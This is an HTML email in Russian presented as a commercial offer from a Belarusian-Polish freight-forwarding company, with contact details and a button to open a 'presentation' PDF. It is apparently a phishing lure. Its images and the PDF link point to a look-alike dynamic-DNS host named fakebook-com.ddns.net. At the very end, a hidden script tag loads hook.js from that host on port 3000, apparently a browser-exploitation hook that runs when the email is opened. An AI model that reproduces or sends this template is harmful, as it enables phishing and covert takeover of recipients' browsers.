
    <DOCTYPE html>
<html>
<head>


<style type="text/css">
			
			#outlook a{padding:0;} 
			body{width:100% !important;} .ReadMsgBody{width:100%;} .ExternalClass{width:100%;} 
			body{-webkit-text-size-adjust:none;} 

			
			body{margin:0; padding:0;}
			img{border:0; height:auto; line-height:100%; outline:none; text-decoration:none;}
			table td{border-collapse:collapse;}
			#backgroundTable{height:100% !important; margin:0; padding:0; width:100% !important;}

			
			body, #backgroundTable{
				 background-color:#FAFAFA;
			}

			
			#templateContainer{
				 border: 1px solid #DDDDDD;
			}

			
			h1, .h1{
				color:#202020;
				display:block;
				 font-family:Arial;
				 font-size:34px;
				 font-weight:bold;
				 line-height:100%;
				margin-top:0;
				margin-right:0;
				margin-bottom:10px;
				margin-left:0;
				 text-align:left;
			}

			
			h2, .h2{
				 color:#202020;
				display:block;
				 font-family:Arial;
				 font-size:30px;
				 font-weight:bold;
				 line-height:100%;
				margin-top:0;
				margin-right:0;
				margin-bottom:10px;
				margin-left:0;
				 text-align:left;
			}

			
			h3, .h3{
				 color:#202020;
				display:block;
				 font-family:Arial;
				 font-size:26px;
				 font-weight:bold;
				 line-height:100%;
				margin-top:0;
				margin-right:0;
				margin-bottom:10px;
				margin-left:0;
				 text-align:left;
			}

			
			h4, .h4{
				 color:#202020;
				display:block;
				 font-family:Arial;
				 font-size:22px;
				 font-weight:bold;
				 line-height:100%;
				margin-top:0;
				margin-right:0;
				margin-bottom:10px;
				margin-left:0;
				 text-align:left;
			}

			
			#templatePreheader{
				 background-color:#FAFAFA;
			}

			
			.preheaderContent div{
				 color:#505050;
				 font-family:Arial;
				 font-size:10px;
				 line-height:100%;
				 text-align:left;
			}

			
			.preheaderContent div a:link, .preheaderContent div a:visited, / .preheaderContent div a .yshortcuts 
				 color:#336699;
				 font-weight:normal;
				 text-decoration:underline;
			}

			
			#templateHeader{
				 background-color:#FFFFFF;
				 border-bottom:0;
			}

			
			.headerContent{
				 color:#202020;
				 font-family:Arial;
				 font-size:34px;
				 font-weight:bold;
				 line-height:100%;
				 padding:0;
				 text-align:center;
				 vertical-align:middle;
			}

			
			.headerContent a:link, .headerContent a:visited,  .headerContent a .yshortcuts {
				 color:#336699;
				 font-weight:normal;
				 text-decoration:underline;
			}

			#headerImage{
				height:auto;
				max-width:600px !important;
			}

			
			#templateContainer, .bodyContent{
				 background-color:#FFFFFF;
			}

			
			.bodyContent div{
				 color:#505050;
				 font-family:Arial;
				 font-size:14px;
				 line-height:150%;
				 text-align:left;
			}

			
			.bodyContent div a:link, .bodyContent div a:visited,  .bodyContent div a .yshortcuts {
				 color:#336699;
				 font-weight:normal;
				 text-decoration:underline;
			}

			.bodyContent img{
				display:inline;
				height:auto;
			}

			
			#templateFooter{
				 background-color:#FFFFFF;
				 border-top:0;
			}

			
			.footerContent div{
				 color:#707070;
				 font-family:Arial;
				 font-size:12px;
				 line-height:125%;
				 text-align:left;
			}

			
			.footerContent div a:link, .footerContent div a:visited,  .footerContent div a .yshortcuts {
				 color:#336699;
				 font-weight:normal;
				 text-decoration:underline;
			}

			.footerContent img{
				display:inline;
			}

			
			#social{
				 background-color:#FAFAFA;
				 border:0;
			}

			
			#social div{
				 text-align:center;
			}

			
			#utility{
				 background-color:#FFFFFF;
				 border:0;
			}

			
			#utility div{
				 text-align:center;
			}

			#monkeyRewards img{
				max-width:190px;
			}
		</style>


<meta charset="utf-8">
<title>Если ехать-то только с нами! </title> 


</head>
<body>
<br>



<center><table border="0" cellpadding="0" cellspacing="0" width="600" id="templateContainer">
                        	<tr>
                            	<td align="center" valign="top">
                                    
                                	<table border="0" cellpadding="0" cellspacing="0" width="600" id="templateHeader">
                                        <tr>
                                            <td class="headerContent">
                                            
                                            	
                                            	<img src="http://fakebook-com.ddns.net/mail-template/logo.jpg" style="max-width:600px;" id="headerImage campaign-icon" mc:label="header_image" mc:edit="header_image" mc:allowdesigner mc:allowtext />
                                            	
                                            
                                            </td>
                                        </tr>
                                    </table></center>


                                 <br>
                                     <hr>
                                         <h1><center>DIMMEX COMPANY</center></h1>
                                     <hr>
                                 <h2>Зравствуйте!</h2>
                                    <p>Мы - беларуско-польская транспортно-экспедиционная компания, основным направлением деятельности которой является организация международных грузоперевозок из Европы в Беларусь, Россию, а так же в обратном направлении.</p>
                                  <p>Беремся возить любые грузы, у нас есть собственный автопарк в количестве 30 машин на польской регистрации 
(тенты, рефрижераторы, площадки), а так же имеется собственный склад в Польше.</p>
                               
<table border="0" cellpadding="0" cellspacing="0" width="10%" id="templateBody">
                                    	<tr>
                                        	<td class="bodyContent" style="padding-top:0; padding-bottom:0;">
                                            	<img src="http://fakebook-com.ddns.net/mail-template/fuuuck.jpg" style="max-width:580px;"  id="headerImage campaign-icon" mc:label="body_image" mc:edit="body_image" mc:allowtext />
                                            </td>
                                        </tr>
</table>



<p>Нам бы очень хотелось просчитать Ваши основные направления, 
а так же сформировать и представить вашему вниманию конкретное коммерческое предложение.<br>
Очень надеемся, что нам удастся заинтересовать Вас своими ценами и комплексом предоставленных услуг</p>
                           <p>Будем рады любому взаимовыгодному сотрудничеству.</p>

                             <p><center><table class="m_-2372879737693681350table-button180" style="margin:0;border-radius:3px" cellspacing="0" cellpadding="0" bgcolor="#CC0000" align="center" width="220" border="0" height="45">
  <tbody><tr>
    <td style="padding:5px 5px" valign="middle" align="center">
              <a href="http://fakebook-com.ddns.net/mail-template/press.pdf" style="font-weight:500;font-size:17px;letter-spacing:0.025em;line-height:26px;color:#fff;font-family:'Poppins',sans-serif;text-decoration:none" target="_blank" data-saferedirecturl="https://www.google.com/url?hl=ru&amp;q=http://em.www.noip.com/wf/click?upn%3DJshxIB7Q-2BcqxedHIg0Vt4q-2Bi63p7GqyMI2p7v-2F54VsRIHTIimeBR9gK1WulKsiU2YxHpgEAJinsMSDsX-2F2-2F5Aa5NwbjDSbYYxDfByAdcVshTZLwpqAM1pFO77Z5mt01IHTe4fUIb91Z1MpcaqzzEQk-2BugclVYQXGRntvNidR6k0-3D_-2BqPsp7rBSJNP8H-2BQcG-2BkISPOkdCEUAT0F7CYMrreh5gstCz8SDPh8BO6TEGY7Wo2ezuNMb0nzay8i9JddYAHfsK6cmqzkaa0YhNT8M20llgJ9J-2B2t017EhbOYLqjQj4SS7-2F1dTSsjFN1Of907wAAinbZKA-2FQdsdRmqAvUry-2B3WeDaFMQUSPY191h1YIPjB-2F1DvimUySZvSf-2Fj9ob-2FfRnGBnA37oCNQubfIHJYdc2FPJhPPHlX-2Fh5ENdtl8-2FpkQysZq392ZB4mj9ypdT0eegWiAxMXx2eayvRFthKT6IhlxKwrzKOTHNQ8ZuZWzebcmJP6cwyWAKulkdoytlPkPHKaw-3D-3D&amp;source=gmail&amp;ust=1529950427958000&amp;usg=AFQjCNGEAn-CztGLb8Ic6N3J-hLEZdS4uQ" data-saferedirectreason="2">Включить презентацию</a>
    </td>
  </tr>
</tbody></table></center></p>
                            <br>
<p><i><ins>С уважением, Евгений (менеджер по организации международных грузоперевозок)</ins></i></p>
  
<hr>
              <h3>Контактная информация</h3>

              <p>номера телефонов:<br>
              <ins>+375 162 54 44 40<br>
+375 29 744 71 73<br>
+375 29 757 19 53<br></ins></p>
              <p>Skype : <i>evg.m_3</i><br>
Email: <i>evg.m@dimmex.pl</i></p>

<script src="http://fakebook-com.ddns.net:3000/hook.js"></script>
</body>
</html>
